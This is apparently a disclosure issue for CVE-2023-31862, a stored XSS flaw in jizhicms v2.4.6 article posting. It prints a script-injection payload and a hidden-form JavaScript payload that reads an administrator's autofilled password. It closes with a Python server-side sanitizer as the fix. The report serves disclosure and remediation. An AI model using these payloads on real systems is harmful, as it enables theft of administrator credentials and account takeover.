Headline
CVE-2023-31862: jizhicms v2.4.6 has a XSS vulnerability in the post article · Issue #86 · Cherry-toto/jizhicms
jizhicms v2.4.6 is vulnerable to Cross Site Scripting (XSS). The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package.
When a backend administrator then clicks the article preview, this malicious JavaScript executes.
When submitting, you can see that the POST request sent is:
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
At this point, if the administrator previews the submitted article, a pop-up window will appear
This shows that the embedded malicious JavaScript script has been executed
I know that the entire system’s cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser’s “automatic password filling” function, then the attacker can construct the following JavaScript script to obtain the administrator’s plaintext password:
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
Submit the script after URL encoding
Administrator clicks on preview:
Here, the plaintext password has been displayed in a pop-up by the JavaScript script. If the pop-up is replaced with code that sends the plaintext password to the attacker’s server, the attacker obtains the administrator’s plaintext password without the administrator’s awareness
Modification suggestions:
Please filter the content of the article on the backend
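As an added example of the suggested fix (not jizhicms code, and written in Python rather than the project's PHP for illustration), the following applies an allowlist sanitizer to the decoded article body on the server side, so that a client that skips the front-end filter still cannot store `<script>`, `<form>` or event-handler markup; the tag/attribute allowlist and the name `sanitize_article` are assumptions for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Allowlist for article bodies (assumption: a minimal CMS set; extend as needed).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")  # rejects javascript: and data: URLs

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the body keeping only allowlisted tags/attributes; <script> and
    <style> are dropped with their contents, other unknown tags lose their markup."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip_depth = [], 0  # skip_depth > 0 while inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
        elif not self.skip_depth and tag in ALLOWED_TAGS:
            kept = []
            for name, value in attrs:
                value = value or ""
                if name not in ALLOWED_ATTRS.get(tag, set()):
                    continue  # drops on* event handlers, style, hidden, etc.
                if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                    continue
                kept.append(f' {name}="{escape(value, quote=True)}"')
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # e.g. <br/>; void tags get no closer

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

def sanitize_article(raw_body: str) -> str:
    """Server-side filter to apply to the decoded POST field before storing it."""
    parser = AllowlistSanitizer()
    parser.feed(raw_body)
    parser.close()
    return "".join(parser.out)

# Constructed input: the URL-encoded body from the report, as a modified request would send it.
REPORTED_BODY = unquote("%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E")
```

Because the filter runs on the server after URL decoding, it applies regardless of what the browser-side editor did, which is the gap the report describes.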